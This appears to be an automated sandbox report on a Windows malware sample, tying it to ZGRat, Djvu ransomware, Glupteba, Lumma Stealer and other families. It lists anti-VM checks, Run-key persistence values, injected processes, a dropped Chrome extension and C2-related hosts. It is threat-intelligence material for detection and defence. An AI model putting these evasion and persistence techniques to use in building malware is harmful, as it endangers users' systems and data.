win7-20231129-es
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\opengl64.dll,#1
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win10v2004-20231215-es
Max time kernel
156s
Max time network
178s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\20a602ac-9a15-469a-80a0-9976fcd0a949\\FFiKfTBiUrpfk88gvzxLozn1.exe\" --AutoStart" | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap\MezcLIfZgZTsssG\BRbsIag.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\ISlHKqSr3Ihf7Rtx6NjnELJr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\gJn_RF5KcsYNA2OkQkJ29HHO.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1428 set thread context of 1104 | N/A | \??\c:\windows\SysWOW64\reg.exe | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe |
| PID 4208 set thread context of 5652 | N/A | C:\Users\Admin\Documents\GuardFox\jYzDAQCRgQcFlUS0Eht2jUs4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1784 set thread context of 5292 | N/A | C:\Users\Admin\Documents\GuardFox\OBUsg_TT5INyXWrn2bwJe6rY.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3296 set thread context of 4640 | N/A | C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
| PID 2328 set thread context of 2504 | N/A | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe | C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe |
| PID 1756 set thread context of 5236 | N/A | C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Tasks\bbdcCALunqMygiEmYm.job | C:\Windows\SysWOW64\sc.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\rdhvdej | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\rdhvdej | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\rdhvdej | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe | N/A |
